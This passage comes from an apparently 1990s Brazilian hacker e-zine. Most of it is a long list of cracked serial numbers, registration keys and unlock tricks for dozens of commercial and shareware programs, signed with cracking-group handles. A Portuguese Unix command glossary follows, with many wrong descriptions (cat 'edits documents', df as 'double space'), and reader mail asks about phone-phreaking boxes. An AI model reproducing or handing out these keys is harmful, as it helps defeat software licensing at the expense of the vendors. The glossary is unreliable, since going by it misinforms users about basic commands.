12363 or name: *** s/n: 8142 BBS Bowl v1.5 (2) : name: XXX s/n: 17388 or name: --- s/n: 8745 or name: You s/n: 19789 BBS Bowl v1.5 (4) : name: Me s/n: 17677 or name: Who? s/n: 18787 or name: Somebody s/n: 18683 BBS Bowl v1.5 (5) : name: Nobody s/n: 18378 BBS Bowl v1.7 : name: You! s/n: 19689 BBS Drag Racing v2.39 : sysop: The GuaRDiaN aNGeL bbs: G.!.$ s/n: GB2<8AN?15N BBS Drag Racing v2.39 (2) : sysop: TeLLeRBoP bbs: G.!.$ s/n: G?:G5?P BBS Drag Racing v2.39 (3) : sysop: You! bbs: G.!.$ s/n: LIB= or sysop: 2U! bbs: G.!.$ s/n: FP0 BBS Drag Racing v2.39 (4) : sysop: 4U! bbs: G.!.$ s/n: HP0 or sysop: SoMeBoDy! bbs: G.!.$ s/n: FI BBS Drag Racing v2.39 (5) : sysop: NoBoDy! bbs: G.!.$ s/n: AI0I5EP or sysop: Xxx! bbs: G.!.$ s/n: K1E= Beame and WhiteSide BW-connect NFS for Windows NT : s/n: 015-005345 BeHierarchic 3.0.x : 2572311E 'Anonymous' Berlitz Synonymus D/E/F/I/S : 25002285 BestWeb v1.0 for Windows : s/n: 01000100101 BetterWriter 1.0.1 : BW9112131832 BGFax +v1.55 for Dos and OS/2 : name: The GuaRDiaN aNGeL s/n: 921343110 pop nr: 4FAD154D or BBS Drag Racing v2.39 () BGFax +v1.55 for Dos and OS/2 (2) : name: NoBoDy! s/n: 1234567 pop nr: D891A399 or name: SoMeBoDy! s/n: 123456789 pop nr: 20CBE0B5 BGFax +v1.55 for Dos and OS/2 (3) : name: You! s/n: 1234 pop nr: 9CF6FBA6 or name: TeLLeRBoP s/n: 123456 pop nr: 1DF17BAE BGFax +v1.55 for Dos and OS/2 (4) : name: ???! s/n: 1234 pop nr: 8B7C69B0 or name: Me s/n: 201258 pop nr: DFCA99E0 BGFax +v1.55 for Dos and OS/2 (5) : name: XXX s/n: 654321 pop nr: 5D0DB5B3 or name: 2U! s/n: 123 pop nr: 81B5174A BGfax v1.30 : name: Batman s/n: 123456 pop nr: C9659F6D BGfax v1.30 (02) C C.A.T. IV 1.0 : (Evaluation Copy SeRvIcEs) C.B.S.O v2.6 : p/w: SYSTEM CA CliPPeR v5.30 build 32? (2) : s/n: 085511-432164 Name: MarQuiS De SoiR+e Compa: UCF CA Clipper v5.30 build 32x : s/n: 085511-732209 name: bit miXer compa:THHG CA Simply Accounting v3.0a for Windows : s/n: 1021602-52559 CA Simply Accounting v4.0b for Windows : s/n: 1020602-212703 CA Visual Object v1.0 for Windows : s/n: 1062301-96825 CA-Clipper for DOS : s/n: FCD101080 CA-Clipper ToolKit for Windows : s/n: FTK201021 CA-Clipper v2.0 for Windows : s/n: FCW201169 CA-Clipper v5.3 for Windows : s/n: 1055110-23047 CA-DBfast 2.0 / win ,os/2 : 026220D30200 CA-REALIZER 2.0 / win, os/2 : 1064100-20010 Cable Management Systems v2.01 for Windows : s/n: CMS94DA0066 Cachet : CM0000045VPM or CM0000567VOM CAD Easy Electrical SymBols for AutoCad LT : s/n: 11301-001403-0120 Caere Image Assistant : s/n: 3304B-D00-999999 Caere PageKeeper v2.01 : s/n: 3254A-C00-019114 p/n: 872-1052-011 Rev A Caffeine : Password: say moof and enter CakeWalk Pro Audio v5.0 : s/n: PCI12345666 CakeWalk Professional v2.01 : s/n: 209038-CPW-2.01 CalcWorks 1.4.x (mac) : 0000000416 'Anonymous' To register: bring up the about box, CalcWorks 1.5.x : Hold down option key when clicking on Register SN:1526543729 1668272306 1593518657 Calendar Maker 4.1 : 2000000 Calendar v3.0 Enterprises : s/n: 61001234 key: 191715 Calera WordScan v3.0 : s/n: BB3123456 or s/n: BB3450110 or s/n: BB3921343 Calera wordscan v3.0 (2) : BB3450110 Calera WordScan v3.1 for Windows : s/n: HP3102305 Caligari true space v1.1 for Windows : 3 10 001 026188 Caligari true space v1.1 for Windows 2 : 3 10 001 027601 CameraMan 2.0 : CMSV0336 CANDI realmode NDIS-2 driver : (CANDI 561E0800000 Candi.ini) s/n: 561E00800000 CANDI v1.31 : name : Floppy of RealLife key: 000000ff559f CanTax for 1995 v1.0 for Windows : s/n: 134-950128-0374079 Canvas 3.5.2 (mac) : 3001700735 Canvas 5.0b2 : 1565464 Canvas for Windows : 5035430458 Canvas v3.52 for Windows : s/n: 485110842 or s/n: 469748712 or s/n: 5035430458 or s/n: 450059719 Captain Kirk v2.00 : name: MarQuiS De SoiR+e s/n: CK2-L7R:IYD:KM1:LLG Capture Prof. v1.1 : s/n: Y6792ih6t##F name: >>> BILL HATES <<< comp/ United Cracking Force CapTuRe Professional v1.1 for Windows : s/n: Y6792ih6t##F name: >>> BILL HATES <<< company: United Cracking Force Carbon Copy (Mac) : 100003660 or 100003661 CarBon Copy Plus v6.0 for Windows : s/n: 10588 Carbon Copy v2.5 for Windows : s/n: 15003149 CarBon Copy v3.0 for Windows : s/n: W30104791 CarBon Copy v6.0 for Windows : s/n: 21566 CarBon Copy v6.0 Guest and Utils for Windows : s/n: 760835 CarBon Copy v6.0 Host for Windows : s/n: 805335 CardGames I v2.7 for OS/2 : name: DoH RuLeZ! s/n: RG42277 CardShop Plus for Windows : s/n: 0729 CatDisk +v9.00 : name: Maroon s/n: G445000QIR CatDisk v7.?? : (Put the next line in your autoexec.bat) SET CATDISK=XYZZY Catdisk v7.xx : (put the next line in your AUTOEXEC.BAT) SET CATDISK=XYZZY Catdisk v7.xx (AUTOEXEC.BAT) : SET CATDISK=XYZZY Catdisk v8.x : name: Maroon brand code: G445000QIR CatDisk v9.00 : name: Maroon s/n: G445000QIR CatFinder 1.5.5 : un: shadow fax s/n: 109176985 or 235642596 or 235983691 or 258605775 or 453029002 or 687233582 . Catz, Your Computer Pet : s/n: 1287-6097-3288 Catz : s/n: 5467-2039-9862 CC Mail DOS 2.01 : 19344 030400 CC Mail v1.11 for Windows : 19342 030390 CC Mail v4.0/DOS : 19340 030380 CCGREP V96.7.25 : First name: tHATDUDE Last name : PC'96 Company: Cracker Reg Number: CYBERGREP CD Copy 1.0 : C.012169 CD Directory 1.0 (mac) : 0400-5678-9012-5236 CD Directory 1.0.x : 0400-4880-7344-0743 or 0400-5283-5483-8636 or 0400-5045-8441-9806 CD Namer 2.0.x : 0027001335 'Anonymous' CD Spectrum Pro v2.0 for Windows 95 : s/n: 51095 CD Spectrum Pro v2.3 : 51095 CD-Gen v4.1 for Windows : s/n: GEN-W-9507-008 CD-Quick Cache +v1.20 : name: DIR&MIR key: 96EE or name: 2U key: D987 CD-Quick Cache +v1.20 (2) : name: XXX key: 1209 or name: THE_GUARDIAN_ANGEL key: 4E56 CD-Quick Cache +v1.20 (3) : name: TELLERBOP key: 5AAB or name: SOMEBODY key: C864 CD-Quick Cache +v1.20 (4) : name: NOBODY key: 3BCC or name: BEOWULF key: 3816 CD-Quick Cache +v1.20 (5) : name: ????? key: B43C or name: YOU key: 00FD or name: ME key: DF92 CD-Quick cache v1.10 : name: Dir&Mir key: 96EE CD-Quick cache v1.11 : name: Batman key: DDB4 CD-Quick cache v1.11 (2) : name: \\\\\\ key: 2A15 CD-Quick cache v1.11 (3) : name: Who? key: 142E CD-Quick cache v1.11 (4) : name: ??? key: 7BBD CD-Quick cache v1.11 (5) : name: Nope key: 0D33 CD-Quick Cache v1.30 : name: Me key: DF92 CD-QuickShare v1.0 for Windows : s/n: 1021-0656-3338-4191 CD-RoM Update +v0.3+ : bbs: G.!.$ name: The GuaRDiaN aNGeL s/n: 5348233 or bbs: G.!.$ name: TeLLeRBoP s/n: 25544768 CD-RoM Update +v0.3+ (2) : bbs: G.!.$ name: You! s/n: 128531 or bbs: G.!.$ name: Me! s/n: 4760422 CD-RoM Update +v0.3+ (3) : bbs: G.!.$ name: NoBoDy! s/n: 1219538 or bbs: G.!.$ name: SoMeBoDy! s/n: 13907134 CD-RoM Update +v0.3+ (4) : bbs : G.!.$ name: 2U! s/n: 2660038 or bbs: G.!.$ name: 4U! s/n: 2761018 CD-RoM Update +v0.3+ (5) : bbs: G.!.$ name: ???! s/n: 12361499 or bbs: G.!.$ name: Xxx! s/n: 15526867 CD-ROM update v0.3 beta : (edit CDROM.REG) CD-ROM update v0.3 beta (01) : name: Batman bbs: Gotham line #1: Registration key : 26579781 CD-ROM update v0.3 beta (02) : name: XXX bbs: XXX line #1: Registration key : 12640594 CD-ROM update v0.3 beta (03) : name: You bbs: XXX line #1: Registration key : 21353794 CD-ROM update v0.3 beta (04) : name: Me bbs: XXX line #1: Registration key : 48085 CD-ROM update v0.3 beta (05) : name: Nobody bbs: XXX line #1: Registration key : 33226941 CD-ROM update v0.3 beta (06) : name: Somebody bbs: XXX line #1: Registration key : 25479647 CD-ROM update v0.3 beta (07) : name: Who? bbs :XXX line #1: Registration key : 14504475 CD-ROM update v0.3 beta (08) : name: *** bbs: *** line #1: Registration key : 1419400 CD-ROM update v0.3 beta (09) : name: ??? bbs: ??? line #1: Registration key : 4669252 CD-ROM update v0.3 beta (10) : name: --- bbs: --- line #1: Registration key : 1726522 CD-Wizard v3.10 : first name: MaC initial: uCF last name: Thunderbyte key: 20517 s/n: 12349 CD-Write v1.1 for Windows : s/n: 111010065995601 CDPlayer v3.xx : name: THE RiDDLER [E0D/P0W] s/n: 79FB CE Tiles 1.0 : 100369 Chamaleon NFS v4.5 : S/N 34768840199594I3 Key code 2FA2 ChaMeLeon NFS Morpher v4.01 : s/n: 34649640121147S3 key: D7D0 ChaMeLeon NFS v3.14 for Windows : s/n: 34059131041712S3 key: A224 ChaMeLeon NFS v3.14 for Windows(2) : s/n: 3433223117197 P3 key: C4ED network auth: 077633 access code: 1-3-0-671515 Chameleon NFS v4.5 : 34768840199594I3 2FA2 ChaMeLeon NFS v5.0 NetManage for Windows NT : s/n: 34933445047297S3 key: B72E ChaMeLeon v4.5 for Windows 95 : s/n: 34866345049070I3 key: 464B ChaMeLeon v4.5 for Windows 95(2) : s/n: 34866345044981I3 key: EAAB or s/n: 34866345051840I3 key: A171 Chameleon v4.x : s/n: 34059131041712 S3 key: A224 Chat with LiSa : bbs: Registered BBS First name: Registered Last name: Sysop s/n: 456600268275 Cheat Master (all versions) : (Make a empty file "A FOREST.SIG") (Free space between A and F is very important) Check It v4.0 and v5.0 : 000-237032 Check List by TouchStone : s/n: D2-002587 CheckIt Analyst v1.0 for Windows : s/n: A7-100163 or s/n: A4-137070 Checkit Diagnostic Kit v4.0 CD : s/n: D3-110036 CheckIt Pro +v1.06 (sysinfo) for Windows : s/n: A1-001725 or s/n: A2-003581 or s/n: A3-062402 or s/n: A4-115796 CheckIt PRO Deluxe v2.0 for DOS : s/n: A5-175324 Checkit PRO v1.06 for Win/DOS and Checkit v4.0+ : A3-097582 or A3-098294 or A3-114035 or A5-171754 Checkit PRO v1.06 or 4.0+ /Windows : A4-115796 CheckIt Pro v1.11 for Dos : s/n: AS-171677 CheckIt Pro v4.0+ for Dos : s/n: A3-062402 or s/n: A3-097582 or s/n: A3-098294 CheckIt Pro v4.0+ for Dos (2) : s/n: A3-114035 or s/n: A5-171754 or s/n: A7-100163 Chem3D Plus (mac) : 60086 KYAKRP ChemDraw Plus 3.0 : Serial Number: 40770 Registration Code: CQXWPQ Cheyenne Backup for Windows 95 : s/n: 2045685 Cheyenne Bitware v3.30U for Windows : s/n: 1600010823417 Chicago (Windows 95+-build 177) : betaside id: 101907 s/n: 999670C9E Chinese Adobe PageMaker v5.0c : s/n: 03-50C8-100094310 Chinese DBase v5 for Windows : TA921A10058791 Chinese ET v5.0 for Windows : s/n: 62256346 Chinese MS Plus for Chinese Windows 95 : CD-KEY: 411-0252964 Chinese Office v7.0 for Chinese Windows 95 : CD-KEY: 411-0252856 Chinese Star v2.0 Plus for Windows 95 : s/n: CSTAR20S00-5000165 or s/n: CSTAR20S00-6001432 Chinese Windows 95 : CD-KEY: 975-4769754 or 422-2272456 or CD-KEY: 26495-OEM-0004791-53803 ChiWriter v4.1 for DOS : s/n: C42243-ENWNU9X Chromassage 2.0 : CH1-1500349 CICS v2.01 for OS/2 : single-user s/n: UN74802 multi-user s/n: UN74786 CICS v2.01 for OS/2 multi user : UN74786 CICS v2.01 for OS/2 single user : UN74802 CIDMan v1.28 : name: PrOmetheus Tel No: 555-000-9999 s/n: ?421253GK@ Cindi v2.0 (NDIS-2 driver) : (CINDI 555000D20000 cindi.ini) s/n: 555000D20000 CineMac 1.1.1 : CFD101C3222 Cinepak Toolkit : 1\15:90.99014:2756968448A45421:N/0 or 1\15:90.99014:2558263296987C21:N/0 CiPA (Common ISDN PAcket driver) : (CIPA 562200000000 [0x??] CIPA.INI) s/n: 562200000000 CiTrix Multi-User Link : s/n: 91126000197 Clarion +v1.002 for Windows : s/n: 407457 Clarion For Windows v2.0 : 721266-JBC Clarion v1.5 for Windows : s/n: 40734X or s/n: 40735X Claris Easy Business Card Maker for Windows : s/n: 0005866781 Claris Emailer 1.0 : f804977886.3295 Claris File Maker Pro Deluxe 2.1 for Windows 95 : s/n: 0006063450 Claris Impact 1.0.x : 0003116155 or 0003119496 Claris Impact v2.0 for Windows 3.1 and Windows 95 : s/n: 0006055899 Claris Organizer 1.0v2 : Enter any number with 6 or more digits ClarisWorks (mac) : 1120000 ClarisWorks v4.0 for Windows 95 : s/n: 011-245578-112 Cleansweep 95 v2.0 : s/n: 009-16C-34193 CleanSweep v1.02 by QuarterDeck for Windows : 000-15C-72794 or 115-25C-22620 or 666-25C-23457 Cleansweep v2.0 by QuarterDeck for Win 95 : 001-16C-26703 or 001-16C-56728 CleanSweep v2.03 by Quarterdeck for Win95 : 001-16C-26703 or 000-16C-76312 CleanSweep v3.0 : 022-18C-96622 Cleensweep for Windows 95 : 000-16C-03475 or 026-16C-86098 Cleensweep v1.0 by QuarterDeck for Windows : 115-25C-22620 Cleensweep v1.0 for Windows : 000-15C-72794 Clickette of the Sausage software 1/2 : user name: Compu Terror company name: (Anything you Like) Clickette of the Sausage software 2/2 : Expiry Date: (Leave Blank) registration key: 050YPQE8YLARYLH2JW6W Clickette of the Sausage software (2) : User Name: Martin Karlsson s/n: 0N32YYVM6VRMHB23E5PJ Client Biller v2.5 for Windows 95 : s/n: 19735368 Clinical Pharmacology v1.2 for Windows : s/n: 6015526 Clinical Pharmacy for Windows : s/n: 9412345 Clip4Win Database Server v1.01 : s/n: DDS101065 Clipfolio 1.2 (mac) : 1231120413450001 Clipfolio 1.5.1 : 1502091113247000003 Clipmate : name: PrOmetheus [Db0/BS96] s/n: F0113042612 Clipmate v4.0 : name: CLIPMATE s/n: FFF02011948 Clipmate v4.0 (2) : name: Registered s/n: F0110717988 Clipmate v4.0 (3) : Name: tHATDUDE # of liscenses: 200 Reg: FC800378828 Clipper 5.3+ WIN : s/n: 085511-432164 name: MarQuiS De SoiRée comp/UCF Clipper v5.01a : s/n: CDX 232393 Clipper v5.3+ : name: MarQuiS De Soire company: UCF s/n: 085511-432164 CloseUp Host/Remote v6.0 for Windows : s/n: 31B57D-1121111 CloseUp v5.0 for Windows : s/n: 1BB463-852875 ClysBar v1.08b : name: Crack da WareZ s/n: BMBKEJANEJ CM Viewer v3.10 : 44718494P31 CM-Textfind v2.5 : name: TwinHead [TWH/BDC] bbs: Blue Devils Courier s/n: 377462064 CM-TextFind v2.5 for DoS : (Cmtfind.exe /NRI) name: -- + TwinHead [TWH/BDC] + -- bbs: Blue Devils Courier s/n: 377462064 CM-TextFind v2.5 for DoS (2) : name: TwinHead [TWH/BDC] s/n: 377197731 CM-Viewer v3.10 : s/n: 44718494P31 CMed 1.08b : name:Crack da WareZ s/n:BMBKEJANEJ CMP QWK-reader v1.42 for Windows : name: The GuaRDiaN aNGeL s/n: 33333 key: 77090 or name: TeLLeRBoP s/n: 33333 key: 71901 CMP QWK-reader v1.42 for Windows (2) : name: Me! s/n: 33333 key: 68354 or name: You! s/n: 33333 key: 68966 CMP QWK-reader v1.42 for Windows (3) : name: 2U! s/n: 33333 key: 68343 or name: 4U! s/n: 33333 key: 68345 CMP QWK-reader v1.42 for Windows (4) : name: SoMeBoDy! s/n: 33333 key: 71863 or name: NoBoDy! s/n: 33333 key: 70693 CMP QWK-reader v1.42 for Windows (5) : name: Xxx! s/n: 33333 key: 69516 or name: Misha [UCF] s/n: 33333 key: 73051 CMPQwk v1.42 : Name: tHATDUDE! Reg: 66666666 Key: -27246 CO/Session Remote v7.0 for DOS, Windows 3.1/95 : s/n: 46290017865 or s/n: 86290020428 CO/Session v5.0 Host : s/n: TT122335 CO/Session v6.1 : s/n: TT122337 or s/n: T500600845 Coach & Coach Pro : s/n: 1552467 Collage : 06-1748-1438 Collage (mac) : 06-1405-6209 Color Fast v1.0 for Windows 95 : s/n: CF0104614 Color Minder 5.5 (mac) : 188877 Color Studio (mac) : CS11305 Color View +v3.20 : name: -- + TwinHead [TWH/BDC] + -- s/n: 378839 or name: MaRooN s/n: 147250 Color view v3.10 : name: Twinhead [TWH/BDC] s/n: 378839 Color View v3.20 : s/n: 147250 name: MaRooN Colorado TapeBackup v2.5 for Windows : s/n: 80-0151-250 ColorIt 2.0 (mac) : CI20A-xxxxx Comet/CG 2.3 (mac) : 22001175 Comma Net Mail v2.50 for Windows : s/n: 19211134581-6 CommandLine95 : name: ED!SON '96 s/n: 901324 Comment : s/n: 1897867 Communicate Lite 1.0.1 (mac) : 802860000000 Communique 2.20 : NAME :CePhYR SURENAME:/|/|GE SERiAL #:0005604bc11111110 Communique v2.20 : first name: The GuaRDiaN aNGeL last name: G.!.$ s/n: ??FBD492C5?????? Communique v2.20 (02) : first name: TeLLeRBoP last name: G.!.$ s/n: ??576821A1?????? Communique v2.20 (03) : first name: You! last name: G.!.$ s/n: ??8BBE22E3?????? Communique v2.20 (04) : first name: Me! last name: G.!.$ s/n: ??4B044C46?????? Communique v2.20 (05) : first name: NoBoDy! last name: G.!.$ s/n: ??880888E2?????? Communique v2.20 (06) : first name: SoMeBoDy! last name: G.!.$ s/n: ??AED124EE?????? Communique v2.20 (07) : first name: Xxx! last name: G.!.$ s/n: ??40DF95C2?????? Communique v2.20 (08) : first name: 2U! last name: G.!.$ s/n: ??A4D18AE1?????? Communique v2.20 (09) : first name: 4U! last name: G.!.$ s/n: ??0CB6C53D?????? Communique v2.20 (10) : first name: ScSi2 last name: G.!.$ s/n: ??6E6B40EE?????? ComPact Disc Master +v3.4 : name: The Hand Of FATE! [THOF!/UCF] s/n: D8F2 or name: THE RiDDLER [E0D/P0W] s/n: 79FB Compactor Pro 1.51 (mac) : 16225913 Compel PE : s/n: ASYM10288 Complete Program Deleter v1.4 for Windows : s/n: 728679 Complete Writers Toolkit : s/n: WT51191850 Compupic v1.29b17 : name: Me phone: 999999 s/n: BBWKBBVEPC Compupic v1.32+ : Name: tHATDUDE Phone: 765-4321 Reg: HX6TCFZBBB Computer Works for Windows : s/n: F16881 ConDiz v1.20+ : s/n: 29944150 name: -- + TwinHead [TWH/BDC] + -- ConDiz v1.20b : s/n: 29944150 name: TwinHead [TWH/BDC] Conference Room 1.x : 1A5F-356E-860F-08DB Conference Room v1.1 : s/n: 1154-1154-2154-1154 ConFig +v8.02 (fullversion) (2) : Line#1 regnam: RENEGADE [XADi] Line#2 regkey: 75000 ConFig +v8.02 (fullversion) (Edit config.reg) : Line#1 regnam: RENEGADE / XADi Line#2 regkey: 60262 ConFig v8.?? (write in CONFIG.REG) : Line#1 REGNAM=THE RiDDLER [E0D/P0W] Line #2 REGKEY=2048149648 Line #3DEMOKE=1358645280 Conflict Catcher 3.0.x (mac) : CC3-001-849-809 Connect and Notify v1.2 : Name: MCVD [ZIPWAREZ] s/n: e10926 Connect+SMTP Gateway for Novell : s/n: 00000744 ConText v2.0 OnLine Dictionary for Windows : s/n: 04.4101.20 Conversion Plus v3.5 for Windows 95/NT : s/n: 2004112-1209 ConVerSions Plus +v3.50a for Windows 95 : s/n: xxxxxxx-xxxx or s/n: 1913279-1312 or s/n: 732991x-xxxx ConVerSions Plus +v3.50a for Windows 95 (2) : s/n: 904954-2539 or s/n: 445940x-xxxx or s/n: 123456x-xxxx or s/n: 972319x-xxxx ConVerSions Plus +v3.50a for Windows 95 (3) : s/n: 983798-0308 or s/n: 90495x-xxxx or s/n: 98379x-xxxx Conversions plus for Windows 2 : 823605-3171 ConVerSions Plus v2.0 for Windows : s/n: 11111111 ConVerSions Plus v2.53 for Windows : s/n: 983798-0308 Cool Edit 96 : name=George Jetson Code=TLHNLGEW Cool Edit 96 (2) : name: NosyFred s/n: FRJRMJRD Cool Edit v1.50 for Windows : name: You! s/n: BMJZCPUX Cool Edit v1.50 for Windows 2 : name: CH:ILM s/n: LLDDGCPZ Cool Edit v1.50 for Windows 3 : name: TeLLeRBoP s/n: GINSONXJ Cool Edit v1.50 for Windows 4 : name: Guardian Angel s/n: BZFLNMAR Cool Edit v1.51 for Windows : name: COOL MAN sn: XJMINCLE Cool Edit +v1.51 for Windows : name: The GuaRDiaN aNGeL s/n: BZFLNMAR or name: TeLLeRBoP s/n: GINSONXJ Cool Edit +v1.51 for Windows (2) : name: You! s/n: BMJZCPUX or name: SoMeBoDy! s/n: GAFSNOMS Cool Edit +v1.51 for Windows (3) : name: Xxx! s/n: AJUZREJM or name: NoBoDy! s/n: IACXAURO Cool Edit +v1.51 for Windows (4) : name: Me! s/n: ZREKPCZY or name: 2U! s/n: ZREBGTYI Cool Edit +v1.51 for Windows (5) : name: 4U! s/n: ZREZERAI or name: CH:ILM s/n: LLDDGCPZ Cool Edit +v1.51 Full for Windows : name: tHE riDDLER [uCF] s/n: XDRFJLMI Cool Edit +v1.51 Lite for Windows : name: tHE riDDLER [uCF] s/n: ZPXSEWLF Cool Edit 1.51 Win : name: Misha [DOD/RAZOR/UCF] s/n: LJLEOAJA Cool Edit for Windows 95 : name: Andre Lagua s/n: TNDTMEWV Cool Edit v1.52 Full for Windows : name: tHE riDDLER [uCF] s/n: CMFRQENH Cool Edit v1.52 Lite for Windows : name: tHE riDDLER [uCF] s/n: NTCSJCLB Cool Wave Editor v1.52 : Name: tHATDUDE! Reg: VLLTICVT Corel Click and Create for Windows 95 : s/n: CNC-095U365763 Corel Draw v4.0 for Windows : s/n: CD4-114-654454 or s/n: CD4-114-647459 Corel Draw v4.0 for Windows (2) : s/n: CD4-234-345567 or s/n: CD4-139-512793 or s/n: CD4-112-698959 Corel Draw v5.0 for Windows : s/n: CD5-050-216533 or s/n: CD5-123-456789 or s/n: CD5-D50-819051 Corel Draw v5.0 Rev.E2 for Windows : s/n: CD5-050-118034 Corel Draw v6.0 For Win95 : s/n: CD6-2354-3963-4625 Corel Draw v6.0 : s/n: 1773 8307 4234 or s/n: 4480-1415-5172 Corel Draw v7.0 : s/n: DR7-7296W63372 or DR7-683219552-7-8 Corel Flow v2.0 for Chinese Windows : s/n: CF2-C20-577300 Corel Flow v2.0 for Windows : s/n: SW-Q023-CF-E or s/n: SAT-507-300794 or s/n: CF2-123-456789 Corel Gallery v2.0 for Windows : s/n: CG2-020-123456 Corel PhotoPaint 5 : PP5-063003 Corel PhotoPaint v5.0 for Windows : s/n: PP5-062483 or s/n: PP5-113889 or s/n: PP5-2522-97100 Corel Photopaint v5.0+ for Windows : PP5-062483 Corel Photopaint v5.0+ for Windows 2 : PP5-2522-97100 Corel Ventura 5 for Windows : s/n: CD5-050-118034 or s/n: CD5-123-456789 Corel Wordperfect Office 7 : WP7-8Q45777988 Coreldraw v4.0 NL for Windows : CD4-114-654-454 or CD4-234-345-567 Coreldraw v5.0 for Windows : CD5-123-456789 Coreldraw v5.0 rev. E2 for Windows : CD5-050-118034 Corelflow v2.0 for Windows : CF2-123-456789 CorStream Dedicated Server v1.0 : s/n: CBA 0009432 CPU Monitor Plus v2.30 for OS/2 v2.1 : s/n: CPUP-V230-512073 cRACKING fORCE : s/n: 100-29692373 Crazy Bytes 3 CD-ROM RAR files : s/n: $@642 kalimero246@$ Create-It (mac) : CRM9301513 CreateIt for Windows : s/n: IFSD-CI1.0-117 Creative Partner 1.0 (mac) : 2B044-D29F-25567 Cross Communications v2.1 : s/n: 01159 Crosseye 1 : User Name: Arnold Hansen s/n: 0H97DZBEYKHE3DYB0CET Crosseye of the Sausage software 1/2 : User Name: Computerror Company Name: (Anything you Like) Crosseye of the Sausage software 1/2 (2) : name: Daniel Barfie company: (Anything you Like) Crosseye of the Sausage software 2/2 : Expiry Date: (Leave Blank) Registration s/n: 0HP1J4Y2TZV1DBRPD6VT Crosseye of the Sausage software 2/2 (2) : Expiry Date: (Leave Blank) Registration s/n: 0N8FVA60WC9N6JA2P52K CrossPoint +v3.1 : (Registered networks includes RFC/UUCP) s/n: C0-1736661 or s/n: C101-300477 CrossPoint +v3.1 (2) : s/n: C11232-2075543 or s/n: C12034-2255889 or s/n: C12345-2176741 or s/n: C23435-375295 CrossPoint +v3.1 (3) : s/n: C32164-1218450 or s/n: C33110-342192 or s/n: C34521-144162 or s/n: C54321-1379929 CrossPoint v3.1 (Registered networks includes RFC/UUCP) : C0-1736661 or C101-300477 CrossTalk XVI v3.81 for Dos : s/n: 004133 CrossTies for Windows : s/n: USA-101-00779084 or s/n: USA-101-0368376 CRT 1.1.2 Terminal program for Win95 : Name: FuJY Company: axis s/n: 00-00-000000 Key:135MJDRGQNMDMJPAGEK8SFJVNOIIBR35 Crush Beta (mac) : tioga Crypt-O-Text : 00092*410177 Cryptomatic 1.01 (mac) : 346190 Crystal Caliburn Pinball : 9525CCW102365-U1 Crystal CaliBurn v1.02 for Windows : s/n: 6511ccw1o4413-u1 or s/n: CPP-5655455 Crystal Graphics Flying Fonts v2.0 for Windows : s/n: RB10-0140-1022 or s/n: RB10-0140-1023 or s/n: RB10-0140-1104 Crystal TOPAS 1.5 (mac) : RB20-0110-0730 CStar v1.0 for Windows : 4690289681360 CStar v2.0 for Windows : s/n: 4690289681360 CU-See-Me : SCNE-011Y-04GN-20CL CU-SeeMe v2.0 for Windows 95 : s/n: DCNE-0110-0ML4-KJCD CU-SeeMe v2.02 32-bit for Windows 95 : s/n: SCNE-O11B-OCSM-A3CL Cu-SeeMe v2.1.1 : s/n: SCBE-001Y-0QJX-ZPCW or SCBE-011Y-05K0-2TCW CuneiForm OCR v1.20 for Windows : s/n: 230494CLC31L CuneiForm OCR v1.22 for Windows : s/n: CRE075122-NET CyBerCom +v1.60 for Dos : (Cyber.exe /R) name: THe aNGRy youTh s/n: 70715199475842386091505467317934 CyBerCom +v1.60 for Dos (2) : name: LURKER/REBELS s/n: 57897220672956204756672967294756 CyBerCom v1.00 for Dos : (Cyber.exe /R) name: TwinHead [TWH/BDC] s/n: 170169191160190187183186 CyBerCom v1.00 for Dos (2) : name: -- + TwinHead [TWH/BDC] + -- s/n: 308382164167177184176181 CyberCom v1.00 for Dos (Cyber.exe /R) : name: TwinHead [TWH/BDC] s/n:170169191160190187183186 CyberCom v1.60 for Dos (Cyber.exe /R) : name: THe aNGRy youTh s/n: 70715199475842386091505467317934 <><><><><><><><><><><><><> 14*********UnIX*********14 Quando eu coloquei aquele anonymous FTP muita gente começou a me perguntar como que fazia tal coisa ou qual comando é o que ou que comando eu uso para aquilo. Vou colocar os principais comandos de UNIX depois desta se nego começar a me pentelhar eu nao respondo mais nada duvidas sobre UNIX morre por aqui esta é a ultima vez que falo dele no e-zine. awk --- procura por um arquivo bdiff --- compara dois arquivos bfs --- scaneia um arquivo cal --- Displays no calendario cat --- edita documentos cc --- C compiler cd --- sistema de diretorios chgrp --- group ownership chmod --- access permissions cmp --- compara dois arquivos comm --- compara dois arquivos e determina suas linhas cp --- copia para outra localidade cu --- chama outro UNIX system date --- retorna com a data e o tempo df --- se nao me engano é uma espécie de um double space diff --- diferencia dois arquivos ou diretorios diff3 --- diferencia tres arquivos ou diretorios du --- edita o arquivo de sistema usado echo --- igual ao echo do DOS ed --- editor de texto ex --- editor de texto f77 --- compilador de fortran find --- localiza um arquivo com determinadas caracteristicas format --- formata grep --- procura por um arquivo help --- chama help kill --- da fim em qualquer processo in --- usado para arquivos linkados ipr --- print is --- informaçao de um ou mais arquivos mail --- usado para receber menssagens mkdir --- cria um novo diretorio mv --- renomeia ou move o arquivo nroff --- usado em format txt ps --- da um display em process status pwd --- da um display no nome do diretorio de trabalho rm --- remove um ou mais arquivos rmdir --- deleta um ou mais diretorios sleep --- começa um inicio de inoperancia do sistema sort --- spell --- da os erros do arquivo split --- divide um arquivo stty --- da um display nos parametros tail --- da um display no final de um arquivo troff --- tset --- unmask --- uucp --- executa de UNIX para UNIX vi --- Full screen editor wc --- da um display no file size who --- da um display nas informaçoes dos usuarios do sistema write --- usado para enviar mensagens para outros usuarios bin --- usado para listar as utilidades do UNIX lib --- mostra libraries usados no Unix tmp --- mostra arquivos temporarios etc --- contem programas administrativos e o passwd dev --- contem arquivos no quais representam devices usr --- contem aquivos dos usuarios <><><><><><><><><><><><><> 15<<<<>>>>MaIL<<<<>>>>15 De: anonymous Certinho gente boa? A FW ta blzinha gostei mesmo será que vc's nao podiam falar mais sobre boxes e tb coloca os codigos de alguns países dai da pra gente usar em outros lugares aquele negocio de colocar 0 antes do numero falou!!! Re: Ta ai anonymous mas ve se da proxima vez coloca seu nome. De: D'Vinci Vc's estao de parabéns a FW esta excelente nao esperava tal qualidade de informaçao em um e-zine e olha que eu já li de tudo na minha opiniao superou na primeira ediçao a CNZ e AXUR05. Parabéns Draco vc esta realmente de parabéns continue assim e que a número dois nao demore a sair. Queria saber pq vc's nao começaram da número zero? Valeu pelo enorme presente que a FW se tornou para nós Brasileiros. Re: Brigaduuuuuuuu. Na realidade nos começamos sim da número 0 mas a ediçao que vc pegou foi aquela que eu ajuntei as três primeiras mas a nova FW ta ai especialmente para vc's. Muito obrigado 